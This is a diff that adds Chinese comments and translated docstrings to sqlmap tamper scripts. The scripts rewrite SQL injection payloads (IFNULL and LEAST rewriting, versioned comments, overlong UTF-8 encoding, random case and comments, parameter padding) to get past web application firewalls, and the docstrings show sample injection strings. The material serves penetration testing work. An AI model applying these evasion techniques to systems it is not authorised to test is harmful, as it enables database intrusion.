= PRIORITY.HIGHEST def dependencies(): @@ -15,49 +15,53 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart + 这个函数用于篡改(tamper)输入的payload,将'IFNULL(A, B)'语句替换为其等效的'IF(ISNULL(A), B, A)'形式。 + + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 - Requirement: - * MySQL - * SQLite (possibly) - * SAP MaxDB (possibly) + 要求: + * 适用于MySQL、SQLite(可能)和SAP MaxDB(可能)数据库。 - Tested against: - * MySQL 5.0 and 5.5 + 测试情况: + * MySQL 5.0 和 5.5 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IFNULL() function + 注意: + * 这个篡改方法对于绕过那些过滤IFNULL()函数的非常弱的定制Web应用防火墙很有用。 - >>> tamper('IFNULL(1, 2)') - 'IF(ISNULL(1),2,1)' + 示例: + >>> tamper('IFNULL(1, 2)') + 'IF(ISNULL(1),2,1)' """ - if payload and payload.find("IFNULL") > -1: - while payload.find("IFNULL(") > -1: - index = payload.find("IFNULL(") - depth = 1 - comma, end = None, None + if payload and payload.find("IFNULL") > -1: # 如果payload不为空且包含'IFNULL' + while payload.find("IFNULL(") > -1: # 遍历所有'IFNULL'语句 + index = payload.find("IFNULL(") # 找到'IFNULL'的位置 + depth = 1 # 初始化括号深度 + comma, end = None, None # 初始化逗号位置和结束位置 + # 遍历payload以找到'IFNULL'语句的结束位置 for i in xrange(index + len("IFNULL("), len(payload)): if depth == 1 and payload[i] == ',': - comma = i + comma = i # 记录逗号位置 elif depth == 1 and payload[i] == ')': - end = i + end = i # 记录结束位置 break elif payload[i] == '(': - depth += 1 + depth += 1 # 增加括号深度 elif payload[i] == ')': - depth -= 1 + depth -= 1 # 减少括号深度 + # 如果找到逗号和结束位置,则进行替换 if comma and end: - _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end].lstrip() - newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) - payload = payload[:index] + newVal + payload[end + 1:] + _ = payload[index + len("IFNULL("):comma] # 提取参数A + __ = payload[comma + 1:end].lstrip() # 提取参数B + newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) # 构造新的IF语句 + payload = payload[:index] + newVal + payload[end + 1:] # 替换原IFNULL语句 else: break diff --git a/src/sqlmap-master/tamper/informationschemacomment.py b/src/sqlmap-master/tamper/informationschemacomment.py index 9ec46b5..585b0c2 100644 --- a/src/sqlmap-master/tamper/informationschemacomment.py +++ b/src/sqlmap-master/tamper/informationschemacomment.py @@ -9,6 +9,7 @@ import re from lib.core.enums import PRIORITY +# 设置优先级为普通 __priority__ = PRIORITY.NORMAL def tamper(payload, **kwargs): @@ -19,9 +20,10 @@ def tamper(payload, **kwargs): 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload - if payload: + if payload: # 如果payload不为空 + # 使用正则表达式查找"information_schema"并添加内联注释 retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload) return retVal diff --git a/src/sqlmap-master/tamper/least.py b/src/sqlmap-master/tamper/least.py index 9c948b4..bbb37e5 100644 --- a/src/sqlmap-master/tamper/least.py +++ b/src/sqlmap-master/tamper/least.py @@ -5,7 +5,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re # 导入正则表达式模块,用于匹配和替换字符串中的模式 from lib.core.enums import PRIORITY @@ -16,30 +16,35 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'LEAST' counterpart + 这个函数用于篡改(tamper)输入的payload,将大于操作符('>')替换为'LEAST'函数的等效形式。 - Tested against: - * MySQL 4, 5.0 and 5.5 + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 测试情况: + * MySQL 4, 5.0 和 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The LEAST clause is a widespread SQL command. Hence, this - tamper script should work against majority of databases + 注意: + * 这个篡改方法对于绕过那些过滤大于字符('>')的弱Web应用防火墙很有用。 + * LEAST函数是一个广泛使用的SQL命令。因此,这个tamper脚本应该适用于大多数数据库。 - >>> tamper('1 AND A > B') - '1 AND LEAST(A,B+1)=B+1' + 示例: + >>> tamper('1 AND A > B') + '1 AND LEAST(A,B+1)=B+1' """ retVal = payload - if payload: + if payload: # 如果payload不为空 + # 使用正则表达式查找'A > B'形式的语句 match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) - if match: + if match: # 如果找到匹配项 + # 构造LEAST函数形式的语句,并替换原语句 _ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _) # 替换原语句为LEAST函数形式 return retVal diff --git a/src/sqlmap-master/tamper/lowercase.py b/src/sqlmap-master/tamper/lowercase.py index 230f7ef..adfab06 100644 --- a/src/sqlmap-master/tamper/lowercase.py +++ b/src/sqlmap-master/tamper/lowercase.py @@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re # 导入正则表达式模块,用于匹配字符串中的模式 -from lib.core.data import kb -from lib.core.enums import PRIORITY +from lib.core.data import kb # 从核心库导入知识库,包含SQL关键字等信息 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为普通 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -17,28 +18,34 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with lower case value (e.g. SELECT -> select) + 这个函数用于篡改(tamper)输入的payload,将其中的关键字字符转换为小写形式(例如,'SELECT' -> 'select')。 - Tested against: + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 测试情况: * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + * MySQL 4, 5.0 和 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions + 注意: + * 这个篡改方法对于绕过那些具有写得不好的允许正则表达式的非常弱的定制Web应用防火墙很有用。 - >>> tamper('INSERT') - 'insert' + 示例: + >>> tamper('INSERT') + 'insert' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload - if payload: - for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): - word = match.group() + if payload: # 如果payload不为空 + # 遍历payload中所有匹配单词边界的字母或下划线模式的字符串 + for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): + word = match.group() # 获取匹配的单词 + # 如果匹配的单词是SQL关键字,则将其转换为小写 if word.upper() in kb.keywords: retVal = retVal.replace(word, word.lower()) diff --git a/src/sqlmap-master/tamper/luanginx.py b/src/sqlmap-master/tamper/luanginx.py index f4bf825..ee3fe76 100644 --- a/src/sqlmap-master/tamper/luanginx.py +++ b/src/sqlmap-master/tamper/luanginx.py @@ -5,13 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import random -import string +import random # 导入随机数模块,用于生成随机字符串 +import string # 导入字符串模块,用于访问字符串常量 -from lib.core.compat import xrange -from lib.core.enums import HINT -from lib.core.enums import PRIORITY -from lib.core.settings import DEFAULT_GET_POST_DELIMITER +from lib.core.compat import xrange # 导入兼容库中的xrange函数,用于兼容Python 2和3的range函数 +from lib.core.enums import HINT # 从核心库导入枚举类型 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +from lib.core.settings import DEFAULT_GET_POST_DELIMITER # 从核心设置导入默认的GET/POST参数分隔符 __priority__ = PRIORITY.NORMAL @@ -29,8 +29,10 @@ def tamper(payload, **kwargs): '34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1' """ - hints = kwargs.get("hints", {}) - delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + hints = kwargs.get("hints", {}) # 从kwargs中获取hints字典,若不存在则初始化为空字典 + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) # 从kwargs中获取delimiter,若不存在则使用默认的GET/POST参数分隔符 + +# 生成大量随机参数并添加到hints[HINT.PREPEND]中,用于绕过WAF hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(500)) diff --git a/src/sqlmap-master/tamper/misunion.py b/src/sqlmap-master/tamper/misunion.py index 596880a..c852b82 100644 --- a/src/sqlmap-master/tamper/misunion.py +++ b/src/sqlmap-master/tamper/misunion.py @@ -8,12 +8,14 @@ See the file 'LICENSE' for copying permission import os import re +# 从sqlmap的库中导入一些枚举和函数 from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST +# 定义dependencies函数,用于在运行tamper脚本时显示警告信息 def dependencies(): singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) @@ -32,5 +34,8 @@ def tamper(payload, **kwargs): >>> tamper('1" UNION ALL SELECT') '1"-.1UNION ALL SELECT' """ - + # 使用正则表达式替换payload中的UNION关键字,前面加上-.1 + # 这样做是为了绕过某些WAF(Web Application Firewall)的检测 + # 正则表达式(?i)\s+(UNION )匹配UNION关键字,并且忽略大小写 + # \g<1>是反向引用,表示替换时保留匹配到的UNION关键字 return re.sub(r"(?i)\s+(UNION )", r"-.1\g<1>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/modsecurityversioned.py b/src/sqlmap-master/tamper/modsecurityversioned.py index 19c1d08..66ab070 100644 --- a/src/sqlmap-master/tamper/modsecurityversioned.py +++ b/src/sqlmap-master/tamper/modsecurityversioned.py @@ -7,16 +7,22 @@ See the file 'LICENSE' for copying permission import os +# 从sqlmap的库中导入随机数生成函数和单次警告消息函数 from lib.core.common import randomInt from lib.core.common import singleTimeWarnMessage +# 导入数据库管理系统枚举和优先级枚举 from lib.core.enums import DBMS from lib.core.enums import PRIORITY +# 设置这个tamper脚本的优先级 __priority__ = PRIORITY.HIGHER +# 定义dependencies函数,用于在运行tamper脚本时显示警告信息 def dependencies(): + # 显示单次警告消息,告知用户这个tamper脚本只针对MySQL数据库 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) +# 定义tamper函数,这是脚本的主要功能函数,用于修改payload def tamper(payload, **kwargs): """ Embraces complete query with (MySQL) versioned comment @@ -38,14 +44,18 @@ def tamper(payload, **kwargs): retVal = payload + # 如果payload不为空 if payload: postfix = '' + # 遍历可能的注释符号,找到payload中的第一个注释符号 for comment in ('#', '--', '/*'): if comment in payload: postfix = payload[payload.find(comment):] payload = payload[:payload.find(comment)] break + # 如果payload中包含空格,说明可以插入versioned comment if ' ' in payload: + # 构造新的payload,插入versioned comment retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix) return retVal diff --git a/src/sqlmap-master/tamper/modsecurityzeroversioned.py b/src/sqlmap-master/tamper/modsecurityzeroversioned.py index c646d1a..f83fb10 100644 --- a/src/sqlmap-master/tamper/modsecurityzeroversioned.py +++ b/src/sqlmap-master/tamper/modsecurityzeroversioned.py @@ -7,15 +7,21 @@ See the file 'LICENSE' for copying permission import os +# 从sqlmap的库中导入单次警告消息函数 from lib.core.common import singleTimeWarnMessage +# 导入数据库管理系统枚举和优先级枚举 from lib.core.enums import DBMS from lib.core.enums import PRIORITY +# 设置这个tamper脚本的优先级 __priority__ = PRIORITY.HIGHER +# 定义dependencies函数,用于在运行tamper脚本时显示警告信息 def dependencies(): + # 显示单次警告消息,告知用户这个tamper脚本只针对MySQL数据库 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) +# 定义tamper函数,这是脚本的主要功能函数,用于修改payload def tamper(payload, **kwargs): """ Embraces complete query with (MySQL) zero-versioned comment @@ -37,12 +43,15 @@ def tamper(payload, **kwargs): if payload: postfix = '' + # 遍历可能的注释符号,找到payload中的第一个注释符号 for comment in ('#', '--', '/*'): if comment in payload: postfix = payload[payload.find(comment):] payload = payload[:payload.find(comment)] break + # 如果payload中包含空格,说明可以插入zero-versioned comment if ' ' in payload: + # 构造新的payload,插入zero-versioned comment retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix) return retVal diff --git a/src/sqlmap-master/tamper/multiplespaces.py b/src/sqlmap-master/tamper/multiplespaces.py index 8f2ae17..6e26a9b 100644 --- a/src/sqlmap-master/tamper/multiplespaces.py +++ b/src/sqlmap-master/tamper/multiplespaces.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import random import re +# 从sqlmap的库中导入知识库和数据类型 from lib.core.data import kb from lib.core.datatype import OrderedSet from lib.core.enums import PRIORITY @@ -35,16 +36,22 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 使用OrderedSet存储找到的SQL关键字,确保关键字的唯一性 words = OrderedSet() + # 使用正则表达式找到payload中的所有单词(SQL关键字) for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() - + # 如果单词是SQL关键字,则添加到OrderedSet中 if word.upper() in kb.keywords: words.add(word) - + # 对于OrderedSet中的每个SQL关键字 for word in words: + # 在关键字前后添加1到4个随机数量的空格 + # (?<=\W)确保我们在非单词字符后替换 + # (?=[^A-Za-z_(]|\Z)确保我们在非单词字符前替换或字符串末尾 retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal) + # 对于后面紧跟着括号的关键字,只添加左边的空格 retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal) return retVal diff --git a/src/sqlmap-master/tamper/ord2ascii.py b/src/sqlmap-master/tamper/ord2ascii.py index f5cf8a2..2277fc1 100644 --- a/src/sqlmap-master/tamper/ord2ascii.py +++ b/src/sqlmap-master/tamper/ord2ascii.py @@ -28,6 +28,8 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 使用正则表达式将所有的ORD()函数调用替换为ASCII()函数调用 + # 正则表达式(?i)\bORD\( 匹配ORD关键字,忽略大小写,并且确保是完整的单词边界 retVal = re.sub(r"(?i)\bORD\(", "ASCII(", payload) return retVal diff --git a/src/sqlmap-master/tamper/overlongutf8.py b/src/sqlmap-master/tamper/overlongutf8.py index 5945356..9fcd81b 100644 --- a/src/sqlmap-master/tamper/overlongutf8.py +++ b/src/sqlmap-master/tamper/overlongutf8.py @@ -32,14 +32,19 @@ def tamper(payload, **kwargs): retVal = "" i = 0 + # 遍历payload中的每个字符 while i < len(payload): + # 如果当前字符是%,并且后面两个字符是十六进制数字,则认为这是一个已经编码的字符 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 else: + # 如果当前字符不是字母或数字,则将其转换为overlong UTF8编码 if payload[i] not in (string.ascii_letters + string.digits): + # 计算并添加overlong UTF8编码 retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) else: + # 如果是字母或数字,则直接添加到结果中 retVal += payload[i] i += 1 diff --git a/src/sqlmap-master/tamper/overlongutf8more.py b/src/sqlmap-master/tamper/overlongutf8more.py index e713745..fd5a7d0 100644 --- a/src/sqlmap-master/tamper/overlongutf8more.py +++ b/src/sqlmap-master/tamper/overlongutf8more.py @@ -33,10 +33,13 @@ def tamper(payload, **kwargs): i = 0 while i < len(payload): + # 如果当前字符是%,并且后面两个字符是十六进制数字,则认为这是一个已经编码的字符 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 else: + # 将当前字符转换为overlong UTF8编码 + # 每个字符被编码为两个字节,第一个字节的高位设置为10(0xC0),第二个字节的高位设置为10(0x80) retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) i += 1 diff --git a/src/sqlmap-master/tamper/percentage.py b/src/sqlmap-master/tamper/percentage.py index 9d62e60..3b772b1 100644 --- a/src/sqlmap-master/tamper/percentage.py +++ b/src/sqlmap-master/tamper/percentage.py @@ -13,7 +13,9 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW +# 定义dependencies函数,用于在运行tamper脚本时显示警告信息 def dependencies(): + # 显示单次警告消息,告知用户这个tamper脚本只针对ASP web应用程序 singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP web applications" % os.path.basename(__file__).split(".")[0]) def tamper(payload, **kwargs): @@ -40,10 +42,12 @@ def tamper(payload, **kwargs): i = 0 while i < len(payload): + # 如果当前字符是%,并且后面两个字符是十六进制数字,则认为这是一个已经编码的字符 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 elif payload[i] != ' ': + # 如果当前字符不是空格,则在其前面添加百分号 retVal += '%%%s' % payload[i] i += 1 else: diff --git a/src/sqlmap-master/tamper/plus2concat.py b/src/sqlmap-master/tamper/plus2concat.py index 3b910f8..2499c81 100644 --- a/src/sqlmap-master/tamper/plus2concat.py +++ b/src/sqlmap-master/tamper/plus2concat.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import os import re +# 从sqlmap的库中导入单次警告消息函数、零深度搜索函数、数据库管理系统枚举和优先级枚举 from lib.core.common import singleTimeWarnMessage from lib.core.common import zeroDepthSearch from lib.core.enums import DBMS @@ -16,6 +17,7 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): + # 显示单次警告消息,告知用户这个tamper脚本只针对Microsoft SQL Server数据库 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): @@ -41,15 +43,20 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 使用正则表达式搜索payload中由'+'连接的CHAR()函数或单引号字符串 match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) if match: part = match.group(0) + # 将匹配的部分拆分为字符列表 chars = [char for char in part] + # 使用zeroDepthSearch函数找到所有的'+'字符位置 for index in zeroDepthSearch(part, '+'): + # 将'+'字符替换为','字符 chars[index] = ',' - + # 构造CONCAT函数的字符串表示 replacement = "CONCAT(%s)" % "".join(chars) + # 将原始的由'+'连接的部分替换为CONCAT函数 retVal = retVal.replace(part, replacement) return retVal diff --git a/src/sqlmap-master/tamper/plus2fnconcat.py b/src/sqlmap-master/tamper/plus2fnconcat.py index ab1005a..8d8ce60 100644 --- a/src/sqlmap-master/tamper/plus2fnconcat.py +++ b/src/sqlmap-master/tamper/plus2fnconcat.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import os import re +# 从sqlmap的库中导入单次警告消息函数、零深度搜索函数、兼容模块中的xrange函数、数据库管理系统枚举和优先级枚举 from lib.core.common import singleTimeWarnMessage from lib.core.common import zeroDepthSearch from lib.core.compat import xrange @@ -17,6 +18,7 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): + # 显示单次警告消息,告知用户这个tamper脚本只针对Microsoft SQL Server数据库 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): @@ -43,22 +45,26 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 使用正则表达式搜索payload中由'+'连接的CHAR()函数或单引号字符串 match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) if match: old = match.group(0) parts = [] last = 0 + # 使用zeroDepthSearch函数找到所有的'+'字符位置 for index in zeroDepthSearch(old, '+'): + # 将每个'+'字符之间的部分作为单独的部分存储 parts.append(old[last:index].strip('+')) last = index - + # 将最后一个'+'字符之后的部分也加入到parts列表中 parts.append(old[last:].strip('+')) replacement = parts[0] + # 遍历parts列表,构造{fn CONCAT()}函数的嵌套调用 for i in xrange(1, len(parts)): replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i]) - + # 将原始的由'+'连接的部分替换为{fn CONCAT()}函数 retVal = retVal.replace(old, replacement) return retVal diff --git a/src/sqlmap-master/tamper/randomcase.py b/src/sqlmap-master/tamper/randomcase.py index 8cb02a8..5a48763 100644 --- a/src/sqlmap-master/tamper/randomcase.py +++ b/src/sqlmap-master/tamper/randomcase.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission import re +# 从sqlmap的库中导入随机范围函数、兼容模块中的xrange函数、知识库和优先级枚举 from lib.core.common import randomRange from lib.core.compat import xrange from lib.core.data import kb @@ -48,19 +49,22 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 使用正则表达式找到payload中的所有关键字(至少两个字母或下划线的单词) for match in re.finditer(r"\b[A-Za-z_]{2,}\b", retVal): word = match.group() - + # 如果单词是SQL关键字,并且不是被引号或括号包围的,或者是一个函数名 if (word.upper() in kb.keywords and re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is None) or ("%s(" % word) in payload: + # 生成一个随机大小写混合的单词 while True: _ = "" for i in xrange(len(word)): + # 随机选择大写或小写 _ += word[i].upper() if randomRange(0, 1) else word[i].lower() - + # 确保生成的单词不是全大写或全小写,并退出循环 if len(_) > 1 and _ not in (_.lower(), _.upper()): break - + # 将原始的单词替换为随机大小写混合的单词 retVal = retVal.replace(word, _) return retVal diff --git a/src/sqlmap-master/tamper/randomcomments.py b/src/sqlmap-master/tamper/randomcomments.py index edf4cba..b0963a3 100644 --- a/src/sqlmap-master/tamper/randomcomments.py +++ b/src/sqlmap-master/tamper/randomcomments.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission import re +# 从sqlmap的库中导入随机范围函数、兼容模块中的xrange函数、知识库和优先级枚举 from lib.core.common import randomRange from lib.core.compat import xrange from lib.core.data import kb @@ -27,24 +28,28 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 使用正则表达式找到payload中的所有单词(至少一个字母或下划线) for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() + # 跳过长度小于2的单词 if len(word) < 2: continue + # 如果单词是SQL关键字 if word.upper() in kb.keywords: - _ = word[0] - + _ = word[0] # 从单词的第一个字符开始构造新的字符串 + # 遍历单词的每个字符(除了第一个和最后一个) for i in xrange(1, len(word) - 1): + # 随机决定是否插入注释 _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i]) - + # 添加单词的最后一个字符 _ += word[-1] - + # 如果没有插入任何注释,则随机选择一个位置插入注释 if "/**/" not in _: index = randomRange(1, len(word) - 1) _ = word[:index] + "/**/" + word[index:] - + # 将原始的单词替换为插入了注释的新字符串 retVal = retVal.replace(word, _) return retVal diff --git a/src/sqlmap-master/tamper/schemasplit.py b/src/sqlmap-master/tamper/schemasplit.py index 07ad37d..8245f08 100644 --- a/src/sqlmap-master/tamper/schemasplit.py +++ b/src/sqlmap-master/tamper/schemasplit.py @@ -27,5 +27,6 @@ def tamper(payload, **kwargs): >>> tamper('SELECT id FROM testdb.users') 'SELECT id FROM testdb 9.e.users' """ - + # 如果payload不为空,则使用正则表达式替换FROM后面数据库表名的点操作符为一个空格加上'9.e.' + # 这是一种绕过某些WAF规则的技术,通过插入一个看似无害的字符串'9.e.'来分割数据库名和表名 return re.sub(r"(?i)( FROM \w+)\.(\w+)", r"\g<1> 9.e.\g<2>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/scientific.py b/src/sqlmap-master/tamper/scientific.py index 9b0ecf7..514b582 100644 --- a/src/sqlmap-master/tamper/scientific.py +++ b/src/sqlmap-master/tamper/scientific.py @@ -29,7 +29,9 @@ def tamper(payload, **kwargs): """ if payload: + # 将闭合括号、逗号、点、星号、正斜杠、反斜杠、竖线、位运算符和逻辑运算符替换为" 1.e" + 原字符 payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload) + # 将函数名后跟左括号替换为" 函数名 1.e(",除非函数名是MID、CAST、FROM、COUNT payload = re.sub(r"(\w+)\(", lambda match: "%s 1.e(" % match.group(1) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload) # NOTE: MID and CAST don't work for sure - + # 返回修改后的payload return payload diff --git a/src/sqlmap-master/tamper/sleep2getlock.py b/src/sqlmap-master/tamper/sleep2getlock.py index f0b3a54..a3e35e1 100644 --- a/src/sqlmap-master/tamper/sleep2getlock.py +++ b/src/sqlmap-master/tamper/sleep2getlock.py @@ -34,6 +34,7 @@ def tamper(payload, **kwargs): """ if payload: + # 将payload中的'SLEEP('替换为'GET_LOCK('%s',,其中'%s'会被kb.aliasName替换 payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName) return payload diff --git a/src/sqlmap-master/tamper/sp_password.py b/src/sqlmap-master/tamper/sp_password.py index 